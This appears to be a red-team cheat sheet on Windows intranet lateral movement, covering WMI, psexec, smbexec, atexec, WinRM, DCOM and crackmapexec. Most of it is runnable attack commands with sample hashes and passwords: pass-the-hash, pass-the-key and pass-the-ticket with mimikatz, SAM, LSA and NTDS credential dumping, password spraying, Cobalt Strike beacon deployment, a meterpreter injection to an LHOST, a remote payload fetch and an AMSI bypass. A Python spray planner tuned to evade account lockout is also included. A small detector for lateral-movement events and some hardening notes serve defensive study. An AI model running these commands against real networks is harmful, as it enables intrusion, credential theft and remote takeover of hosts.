Intranet#
The intranet is the internal local area network (LAN). In a typical home Wi-Fi or small-business network the internal hosts can reach the router directly, and the router connects to the ISP's fiber line for internet access.
A LAN can be divided into several networks (subnets) by switches and firewalls, with access control between them; each such zone is what is meant by a security domain.
Typical zones are a dedicated server area (usually called the DMZ, demilitarized zone), an operations and maintenance area, an internal office area, and so on. "Intranet penetration" means penetration within the LAN; its harder part is domain penetration.
KB2871997 & KB2928120#
Microsoft released two patches in 2014, KB2871997 and KB2928120, that are widely (and somewhat inaccurately) described as the end of local-account Pass-the-Hash (PTH). More precisely:
- KB2871997 back-ports credential-protection features (Protected Users group support, RestrictedAdmin RDP, clearing of cleartext Wdigest credentials on logoff) and adds the well-known SIDs S-1-5-113 (Local account) and S-1-5-114 (Local account and member of Administrators group), so that network logon by any local account can be denied with one "Deny access to this computer from the network" policy entry.
- KB2928120 is the MS14-025 fix for Group Policy Preferences: it stops passwords (cpassword) from being stored in SYSVOL. It has nothing to do with NTLM.
- What actually blocks remote wmi, psexec, schtasks, at and admin-share access with a non-built-in local administrator is UAC remote restriction (LocalAccountTokenFilterPolicy = 0, the default since Vista): the network logon itself succeeds, but the token is filtered down to a standard user. The built-in Administrator (RID 500) is exempt, so PTH with its NT hash still yields full administrative access, and domain accounts are not affected at all.
- PTH depends on NTLM. Where NTLM is disabled on the target, psexec-style tools cannot authenticate with a hash, but mimikatz sekurlsa::pth with the account's AES key (over-pass-the-hash, see PTK below) still works because it obtains Kerberos tickets instead.
UNC Path#
A UNC (Universal Naming Convention) path is the network path format used to identify the location of a shared resource; it lets you address a remote share on the local network.
A UNC path starts with two backslashes \\, followed by the name or IP address of the remote computer, then the share name, an optional path inside the share, and the file name. For example:
\\ComputerName\ShareName\Path\FileName
Here ComputerName is the name or IP address of the remote computer, ShareName the share being accessed (administrative shares such as C$ or ADMIN$ are valid here too), Path the path inside the share, and FileName the target file.
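As an added example (not code from the original page), a small Python parser for this format that also recognises the default administrative shares (C$, ADMIN$, IPC$) discussed later on the page; the \\?\UNC\ long-path form and forward slashes are handled as well:

```python
import re

# Default administrative shares on NT-family systems (see the ipc$ section):
# drive roots as <letter>$, the Windows directory as ADMIN$, named pipes as IPC$.
_ADMIN_SHARE = re.compile(r"^(?:[A-Za-z]\$|ADMIN\$|IPC\$)$", re.IGNORECASE)


def parse_unc(path: str) -> dict:
    """Split a UNC path into host, share, sub-path and file name.

    Accepts \\\\host\\share\\dir\\file and the long-path form
    \\\\?\\UNC\\host\\share\\dir\\file. Raises ValueError for anything else.
    """
    p = path.replace("/", "\\")
    if p.upper().startswith("\\\\?\\UNC\\"):       # strip the \\?\UNC\ prefix
        p = "\\\\" + p[8:]
    if not p.startswith("\\\\") or p.startswith("\\\\\\"):
        raise ValueError(f"not a UNC path: {path!r}")
    parts = p[2:].split("\\")
    if not parts or not parts[0]:
        raise ValueError(f"missing host: {path!r}")
    host = parts[0]
    share = parts[1] if len(parts) > 1 and parts[1] else None
    rest = [x for x in parts[2:] if x]             # drop empty segments (\\a\\b)
    filename = rest[-1] if rest else None
    subdir = "\\".join(rest[:-1]) if len(rest) > 1 else ""
    return {
        "host": host,
        "share": share,
        "path": subdir,
        "file": filename,
        "admin_share": bool(share and _ADMIN_SHARE.match(share)),
    }


if __name__ == "__main__":
    print(parse_unc(r"\\192.168.1.56\c$\Windows\Temp\1.txt"))
```

The admin_share flag is the practitioner's first question when a UNC path shows up in a log: a write to \\host\ADMIN$ or \\host\C$ from a workstation is the file-drop half of psexec-style lateral movement.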
WMI#
WMI (Windows Management Instrumentation) is the management framework of Windows; think of it as an API for interacting with the system. Its value in penetration testing is that nothing needs to be downloaded or installed, since WMI is built into every Windows system, and remote execution through it drops no file on disk. "Leaves no traces" is too strong, though: remote WMI produces a type 3 logon (event 4624), entries in the Microsoft-Windows-WMI-Activity/Operational log, and any process it starts has WmiPrvSE.exe as its parent, which is exactly what detection rules look for.
Port 135#
Port 135 is the RPC endpoint mapper. WMI (and therefore wmic) runs over DCOM: the client first contacts 135, which hands back a dynamic high port (49152-65535 on Vista and later) for the actual WMI connection, so both must be reachable through the firewall.
The specific usage of wmic is as follows:
# Open a calculator
wmic /node:ip /user:username /password:password PROCESS call create "calc.exe"
# No output is returned: process call create only reports the return value and the new PID
wmic /node:192.168.1.56 /user:administrator /password:aab+1s PROCESS call create "calc.exe"
# So redirect the command's output to a file and fetch it afterwards (e.g. over the c$ share)
wmic /node:192.168.1.56 /user:administrator /password:aab+1s process call create "cmd.exe /c ipconfig >C:\1.txt"
If the IP is unreachable, wmic fails with an "RPC server is unavailable" error; if the password is wrong, it fails with "Access is denied" (the original screenshots are not reproduced here). Against a reachable host with valid credentials the command executes successfully, but because wmic returns no output from the created process, the result must be written to a text file on the target and read back.
WMIEXEC#
Get an interactive shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.56 administrator aab+1s
Execute a single command
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.56 administrator aab+1s "cmdkey /list"
The examples above supply a password. If you only have a hash, inject it into the current logon session with wce and then run wmiexec without credentials:
wce -s account:hostname_or_domain:LM:NTLM
cscript //nologo wmiexec.vbs /shell 192.168.0.1
If the captured LM hash is aad3b435b51404eeaad3b435b51404ee (the empty LM hash) or is shown as No Password, 32 zeros can be used in place of the LM hash.
wmiexec.exe#
wmiexec.exe ./administrator:aab+1s@192.168.1.56 "whoami"
Pass the hash (impacket syntax: -hashes LM:NT and [domain/]user@target; ./ denotes a local account)
wmiexec.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/administrator@192.168.10.173 "ipconfig"
https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md
Ports 137, 138, 139#
Ports 137 (NetBIOS name service) and 138 (NetBIOS datagram service) are UDP; port 139 is the NetBIOS session service, over which SMB (file and printer sharing) was carried before direct SMB over TCP 445 existed.
Port 445#
SMB directly over TCP (no NetBIOS): shared folders, shared printers, and the IPC$ named-pipe share that most of the tools below rely on.
ipc$#
IPC$ (Inter-Process Communication share) is the share through which named pipes are exposed for inter-process communication. Supplying a trusted username and password sets up an authenticated SMB session on which the rest of the remote access (admin shares, service control, scheduled tasks) rides; NT/2000 and later expose it by default. Note that "secure channel" here only means authenticated, not encrypted: SMB signing and SMB 3 encryption are separate settings.
NT/2000 and later also create default administrative shares at install time: every fixed drive root (c$, d$, e$, ...) and the Windows directory (admin$, which maps to %SystemRoot%, winnt on the older systems).
net use \\192.168.1.56\c$ "password" /user:"domain\username"
net use \\192.168.1.56\c$ "aab+1s" /user:administrator
The same net use connection issued from another host:
Extended Syntax#
# Connect to the admin share with the credentials of the current session
net use \\192.168.1.56\c$
# Delete the ipc$ connection
net use \\192.168.1.56\ipc$ /del
# Map the target disk to a local drive letter
net use z: \\192.168.1.56\c$
# Delete the mapping
net use z: /del
# Close all connections from this host
net use * /del /y
Lateral Movement SMB (via port 445)#
SMB lateral movement first needs an authenticated session to IPC$, established with a password or by passing the hash. The impacket psexec/smbexec tools run the payload as a service, so the resulting shell is SYSTEM; Sysinternals PsExec runs as the authenticating user unless -s is given. The target's firewall must allow TCP 445.
psexec#
net use \\192.168.1.56\c$ "aab+1s" /user:administrator
PsExec.exe \\192.168.1.56 whoami
.\PsExec.exe -u administrator -p 123456 \\dc01 cmd
# Interactive shell; -s runs cmd.exe as SYSTEM, and the credentials come from the existing ipc$ session when -u/-p are omitted
psexec -accepteula \\ip -s cmd.exe
Execution principle
- Connect to the target over ipc$ and copy PSEXESVC.exe to the ADMIN$ share.
- Through the Service Control Manager (SCManager), create the PSEXESVC service remotely and start it.
- The client talks to the service over a named pipe; the service starts the requested program and relays its output back to the client.
- After execution the service is stopped and deleted. All of this is recorded in the Windows logs (System event 7045 for the service install, and Security 4697 where service-install auditing is enabled). PsExec also occasionally fails to remove the service, so it is generally not recommended; wmiexec is preferred.
C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe
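The service-install and process-creation artifacts just listed are what a defender keys on, and the same idea covers smbexec (a service whose image is a cmd.exe one-liner), wmiexec/wmic (cmd.exe spawned by WmiPrvSE.exe) and schtasks/atexec (a task created outside \Microsoft\). The following is an added example, not from the original page: a small Python detector run over constructed sample event records that stand in for System 7045, Security 4688 and 4698 events. Field names are simplified and the records are made up for the demonstration.

```python
import re

# Constructed sample events (not real captures). Field names are simplified
# versions of the Windows event XML fields.
SAMPLE_EVENTS = [
    # PsExec: service PSEXESVC installed
    {"id": 7045, "host": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    # impacket-smbexec style: random service name, image is a cmd one-liner
    {"id": 7045, "host": "WS02", "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
    # wmiexec: cmd.exe under WmiPrvSE.exe writing output to the ADMIN$ share
    {"id": 4688, "host": "WS03", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c ipconfig 1> \\127.0.0.1\ADMIN$\__1699999999.1 2>&1"},
    # schtasks /create or atexec: a task outside the Microsoft tree
    {"id": 4698, "host": "DC01", "TaskName": r"\adduser", "SubjectUserName": "administrator"},
    # benign: notepad started from explorer
    {"id": 4688, "host": "WS03", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

_SVC_PSEXEC = re.compile(r"psexesvc", re.I)
_SVC_CMD = re.compile(r"^(%COMSPEC%|cmd(\.exe)?)(\s|$)", re.I)
_WMI_HOST = re.compile(r"\\wmiprvse\.exe$", re.I)
_LOCAL_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN|C)\$", re.I)


def classify(ev: dict):
    """Return (technique, evidence) for one event, or None if it looks benign."""
    eid = ev.get("id")
    if eid == 7045:
        name, image = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        if _SVC_PSEXEC.search(name) or _SVC_PSEXEC.search(image):
            return ("psexec", "service PSEXESVC installed")
        if _SVC_CMD.search(image) or _LOCAL_SHARE.search(image):
            return ("smbexec", "service image is a cmd.exe one-liner writing to a local admin share")
    elif eid == 4688:
        if _WMI_HOST.search(ev.get("ParentProcessName", "")):
            via_share = _LOCAL_SHARE.search(ev.get("CommandLine", ""))
            return ("wmiexec" if via_share else "wmi",
                    "process spawned by WmiPrvSE.exe (remote WMI process creation)")
    elif eid == 4698:
        task = ev.get("TaskName", "")
        if not task.lower().startswith("\\microsoft\\"):
            return ("schtasks/at", f"non-Microsoft scheduled task {task} created")
    return None


def detect(events):
    """Run classify() over a list of events and collect findings."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"host": ev["host"], "event_id": ev["id"],
                             "technique": hit[0], "evidence": hit[1]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

In a real pipeline you would additionally correlate each hit with the preceding 4624 logon type 3 on the same host to recover the source IP and account; that join is left out here to keep the example offline.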
cs - plugins#
Select the host to pivot to and choose jump-psexec64.
Choose a listener: if the target can reach the team server directly, pick the HTTP/HTTPS listener (1); for purely internal lateral movement use an SMB beacon listener (2).
Or do it from the command line:
jump [module] [target] [listener]
jump psexec64 192.168.10.173 local
This pivots to the target via psexec using credentials already known to the beacon (its current token).
The resulting topology: with the HTTP beacon the new session talks straight to the team server, so it is shown as a parent-child relationship; with the SMB beacon it is a link relationship through the existing beacon.
Switching to the SMB beacon, the linked host is drawn with four circles after its IP and a yellow SMB arrow.
https://www.cnblogs.com/sup3rman/p/12381874.html
SMBEXEC#
Plaintext password
smbexec.exe administrator:aab+1s@192.168.1.56
Pass the hash (the LM half may be left empty; impacket substitutes the empty LM hash):
smbexec -hashes :$HASH$ administrator@192.168.1.56
smbexec -hashes :$HASH$ domain/administrator@192.168.1.56
Dump hashes on the target (screenshot not reproduced).
atexec#
- Batch (batch-file syntax; in an interactive cmd window write %i instead of %%i, and note that # is not a comment character in cmd, so the explanations below use REM)
REM Batch check: which IPs accept this plaintext password over ipc$
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator
REM Batch check: one plaintext password against many IPs, with command output
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami
REM Batch check: many plaintext passwords against one IP, with command output
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.1.56 whoami
REM Batch check: many NT hashes against one IP, with command output
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.1.56 whoami
PTH#
In a domain or workgroup, the NT hash of every account that has logged on to a machine is held in that machine's LSASS memory. Windows authentication never sends the password itself: the password the user types is hashed (MD4 over its UTF-16LE form), and that hash is what NTLM authentication proves knowledge of.
After the initial logon Windows keeps the hash in memory so the user is not asked for the password again (single sign-on).
A credential dump therefore yields a large number of hashes. As attackers we do not know the passwords, but we do not need them: during NTLM authentication we supply the hash in place of the password, the target computes the same challenge response, and the comparison succeeds.
Windows compares the hashes and warmly welcomes the attacker. In short, that is the Pass-the-Hash attack.
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
mimikatz - PTH#
privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a
A new cmd window opens whose logon session carries the injected NTLM credential; from that window, access the target's shares (for example dir \\target\c$) and copy files as needed.
References:
Intranet Penetration - Hash Passing Attack
PTK#
Pass the Key (over-pass-the-hash): instead of the NT hash, the account's Kerberos AES key is injected, so authentication goes over Kerberos rather than NTLM. It is often described as "requiring KB2871997", but the technique itself does not depend on the patch; it is simply the option that keeps working where NTLM hash replay is blocked, provided the domain supports AES and you hold the key.
Use mimikatz to obtain aes256_hmac:
sekurlsa::ekeys
Pass the key:
sekurlsa::pth /user:mary /domain:hsyy.com /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
PTT#
Pass the Ticket: request a TGT with the hash, inject the ticket, then use Kerberos-authenticated access. Steps:
1. Request a TGT with kekeo: tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c (kekeo writes the ticket to a .kirbi file)
2. Import the ticket in mimikatz: kerberos::ptt TGT_mary@hsyy.com_krbtgt~hsyy.com@hsyy.com.kirbi
3. Check the cached tickets: klist
4. Use it: dir \\192.168.213.163\c$ (Kerberos needs a host name or FQDN to request a service ticket; with a bare IP Windows typically falls back to NTLM, so prefer the target's DNS name)
smbclient#
Authentication login#
- Plaintext (Samba smbclient; -L lists the shares)
smbclient -L //192.168.10.173 -U Administrator
- Hash (this is impacket's smbclient built as an exe, not Samba's; -hashes takes LM:NT)
smbclient.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/administrator@192.168.10.173
Null session enumeration#
smbclient -N -U "" -L //192.168.1.214
rpcclient#
# rpcclient -U "" -N 10.10.10.161
rpcclient $>enumdomusers
# rpcclient -U corp.pentest.lab/administrator 10.10.10.161
cme#
https://mpgn.gitbook.io/crackmapexec/getting-started/installation/installation-on-windows
Execute command#
crackmapexec smb 192.168.10.173 -u administrator -H 04cea78fa35a5be51f4aee6375651e8a -x ipconfig
PowerShell (-X runs a PowerShell command instead of a cmd command)
#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
Bypass AMSI (supply your own bypass script)
#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload
cme network scan#
crackmapexec smb 10.0.0.0/24
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -H 04cea78fa35a5be51f4aee6375651e8a --shares
Null session enumeration#
cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 -u '' -p '' --pass-pol
cme smb 10.10.10.161 -u '' -p '' --users
cme smb 10.10.10.161 -u '' -p '' --groups
# Some hosts accept a non-existent user with an empty password (guest-style access)
cme smb 10.10.10.178 -u 'a' -p '' --shares
# Recursively list the contents of every readable share
crackmapexec smb 10.10.10.178 -u 'a' -p '' -M spider_plus
Credential retrieval#
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --sam
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --lsa
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds vss
msf reverse shell#
Enumerate active sessions on remote targets#
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
Password spraying#
Use spaces to specify multiple usernames/passwords
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
Specify a dictionary through a text file
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
By default cme stops at the first valid credential; --continue-on-success keeps spraying so that every valid pair is found
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
# One-to-one: line N of the user file with line N of the password file, instead of every combination
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-success
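The logic behind these flags, as an added example that is not cme's code: a Python spray planner that orders attempts password-major (each account is tried once per pass, which is what keeps a spray under the lockout threshold), stops touching an account before the threshold is reached, and mirrors --continue-on-success and --no-bruteforce. The account table and fake_auth are constructed stand-ins for a real SMB logon.

```python
# Constructed credential store standing in for the target hosts (sample data).
FAKE_ACCOUNTS = {"alice": "Summer18", "bob": "Winter19", "carol": "Summer18", "dave": "P@ssw0rd"}


def fake_auth(user: str, password: str) -> bool:
    """Stand-in for an SMB logon attempt; True on success."""
    return FAKE_ACCOUNTS.get(user) == password


def plan_attempts(users, passwords, pairwise=False):
    """Order of attempts.

    Default is cme's behaviour: every user x every password, password-major,
    so each account sees one guess per pass. pairwise=True mirrors
    --no-bruteforce: line i of users.txt with line i of passwords.txt only.
    """
    if pairwise:
        return list(zip(users, passwords))
    return [(u, p) for p in passwords for u in users]


def spray(users, passwords, auth=fake_auth, lockout_threshold=5,
          pairwise=False, continue_on_success=False):
    """Run the spray against auth().

    An account is left alone once it has lockout_threshold-1 failures, so the
    spray itself never trips a policy of lockout_threshold bad logons (the
    observation window that resets badPwdCount is ignored here).
    """
    found, failures, skipped = {}, {}, []
    for user, pw in plan_attempts(users, passwords, pairwise):
        if user in found:
            continue                          # nothing to learn from more guesses
        if failures.get(user, 0) >= lockout_threshold - 1:
            skipped.append((user, pw))        # one more failure would lock it out
            continue
        if auth(user, pw):
            found[user] = pw
            if not continue_on_success:
                break                         # cme's default: stop at the first hit
        else:
            failures[user] = failures.get(user, 0) + 1
    return {"found": found, "failures": failures, "skipped": skipped}


if __name__ == "__main__":
    print(spray(list(FAKE_ACCOUNTS), ["Summer18", "Winter19", "P@ssw0rd"],
                lockout_threshold=2, continue_on_success=True))
```

Read the domain's lockout threshold (cme --pass-pol, above) before choosing lockout_threshold; with a threshold of 0 (no lockout) the guard never triggers.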
Authentication#
- Domain user with a hash. A dumped credential line has the form user:RID:LM:NT (this one is from a SAM dump); -H accepts either LM:NT or the NT hash alone:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
- Local authentication
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
A successful logon is reported as follows; (Pwn3d!) means the account has administrative rights on that host:
SMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\Username:Password (Pwn3d!)
winRM#
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
# use the latest release, CME is now a binary packaged with all its dependencies
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip
# execute cme (smb, winrm, mssql, ...)
root@payload$ cme smb -L
root@payload$ cme smb -M name_module -o VAR=DATA
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
root@payload$ cme mimikatz --server http --server-port 80
at, schtasks,#
- at
Windows versions before 8 / Server 2012 (at is deprecated from there on; use schtasks instead).
at \\computername [[id] [/delete] | /delete [/yes]]
at \\computername <time> [/interactive] [/every:date[,...] | /next:date[,...]] <command>
Generate an SMB beacon
Upload the SMB beacon file
Add the scheduled task
shell at \\192.168.10.173 10:51 c:\local-smb.exe
The task ran, but no session came back: an SMB beacon does not call out, it waits on a named pipe and has to be linked from an existing beacon (link <target>).
Switching to an HTTP ("web") beacon, the session came back on its own.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at
- schtasks
Available on all current versions (the replacement for at).
schtasks create
Create a task that runs the uploaded file (full syntax from the Microsoft docs):
schtasks /create /sc <scheduletype> /tn <taskname> /tr <taskrun> [/s <computer> [/u [<domain>\]<user> [/p <password>]]] [/ru {[<domain>\]<user> | system}] [/rp <password>] [/mo <modifier>] [/d <day>[,<day>...] | *] [/m <month>[,<month>...]] [/i <idletime>] [/st <starttime>] [/ri <interval>] [{/et <endtime> | /du <duration>} [/k]] [/sd <startdate>] [/ed <enddate>] [/it] [/z] [/f]
# Run c:\user.bat daily as SYSTEM on the remote host; add /u domain\user /p password if there is no existing ipc$ session
schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F
schtasks run
Run the task immediately (/i ignores the schedule and other constraints)
schtasks /run /s 192.168.213.163 /tn adduser /i
schtasks delete
Delete the task
schtasks /delete /s 192.168.213.163 /tn adduser /f
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
sharpwmi#
.\sharpwmi.exe login 192.168.10.1/24 administrator aab+1s cmd whoami
Error seen when running it through Cobalt Strike (execute-assembly):
[-] Invoke_3 on EntryPoint failed.
nbtscan#
Scan a range for NetBIOS names (computer names); -s : sets the output field separator
bash$ sudo nbtscan -v -s : 192.168.1.0/24
- CS plugin
winRM#
WinRM (Windows Remote Management) is Microsoft's implementation of WS-Management, a standard SOAP-based protocol that lets hardware and operating systems from different vendors interoperate. It is used to manage local or remote servers and provides an interactive command-line shell (similar to Telnet) that reduces the effort of administration.
Ports:
HTTP (5985)
HTTPS SOAP (5986)
Prerequisites: Credentials and permissions
CS has a WinRM module: winrm (x86) and winrm64 (x64) run a PowerShell script on the target via WinRM. Choosing winrm64 shows the following dialog:
Lateral movement needs credentials. These can come from internal password spraying (trying already-known passwords against other hosts to find reuse) or from historical RDP credentials (saved when an administrator logged in to an internal host over RDP and let the client store the password), among other sources.
As shown in the figure, the password credential for 192.168.1.214 is already available, but the credential for 192.168.1.55 is unknown; at this point, you can try using the credential for 192.168.1.214.
Select listeners and sessions as needed; the session is the current beacon.
Attempt to run, but an error occurred.
jump winrm64 192.168.1.55 test
Checking the server's ports shows that 5985 is not open.
The WinRM service exists on Windows Server 2008 but no listener is configured, so the port stays closed; run winrm quickconfig -q (or the short form winrm qc) on the server to create the HTTP listener on 5985, start the service and add the firewall exception.
- Enable the WinRM service
Rechecking the port status, 5985 is now open.
- Enable or disable the firewall command
C:\Windows\system32>netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes
- Use PowerShell to connect to the server
On the client you first need to add the server to the trusted hosts list (only needed for non-Kerberos connections, i.e. by IP or in a workgroup):
PS C:\Users\Administrator> Set-Item wsman:\localhost\Client\TrustedHosts -value 192.168.1.* -Force
# Run this on the client that connects out, not on the server.
Or, from cmd (in PowerShell the @{...} argument must be quoted):
winrm set winrm/config/client @{TrustedHosts="*"}
PS C:\Users\Administrator> Enter-PSSession 192.168.1.55 -Credential administrator
Enter credentials, connection successful.
Or
New-PSSession -ComputerName 192.168.1.55 -Credential (Get-Credential)
Enter-PSSession 1
Operate via CS
beacon> jump winrm64 192.168.1.55 test
Successfully returned shell.
Repair suggestions:
Disable WinRM
winrm delete winrm/config/Listener?Address=*+Transport=HTTP
- ⚠️ Windows Server 2012 and later enable the WinRM HTTP listener by default; on client editions (Windows 8/10) the service exists but no listener is created until someone runs winrm quickconfig or Enable-PSRemoting.
evil-winrm#
GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
WinRS#
WinRS (Windows Remote Shell) is a command-line client that runs commands on a remote Windows host; it sends the requests over the WinRM protocol. It ships with Windows Server 2008 and later and with Windows 7 and later clients. To use it, WinRM must be enabled on the remote server and the account used must have administrative rights on the target (or be a member of its Remote Management Users group).
winrs -r:192.168.1.55 "cmd /c ipconfig"
# -r: also accepts a URL, so a listener on a non-default port (port reuse, e.g. -r:http://192.168.1.55:80) can be targeted; -u/-p pass explicit credentials
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s whoami
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s cmd
DCOM#
DCOM (Distributed Component Object Model) is Microsoft's network extension of COM: it lets applications on different computers connect and communicate, so a client can instantiate a COM object on a remote host and call its methods. For lateral movement this needs local administrator rights on the target and travels over RPC (port 135 plus a dynamic high port), so it does not depend on 445 or 5985 for the execution itself. MMC20.Application is the classic object to abuse because its ExecuteShellCommand method runs an arbitrary command.
Check that the class is registered on the target (this is the CLSID of MMC20.Application):
PS C:\Users\Administrator> Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'
PS C:\Users\Administrator> $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.55"))
PS C:\Users\Administrator> $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")
PS C:\Users\Administrator> Get-Content \\192.168.1.55\c$\fromdcom.txt
WIN-BVVD8VFVMPR
SCShell#
No445#
GitHub - JDArmy/NO445-lateral-movement: command execute without 445 port
References#
https://www.redteam101.tech/offensive-security/lateral-movement/shi-yong-scshell-jin-hang-heng-xiang-yi-dong
https://github.com/BlWasp/CME_cheatSheet
https://mpgn.gitbook.io/crackmapexec/
https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/
https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
http://www.kxsy.work/2022/02/14/nei-wang-shen-tou-zui-shi-yong-de-heng-xiang-yi-dong-zong-jie/
https://www.cnblogs.com/gamewyd/p/6805595.html
https://www.cnblogs.com/zhengna/p/15309006.html
http://k8gege.org/Ladon/WinrmScan.html
https://cloud.tencent.com/developer/article/1937116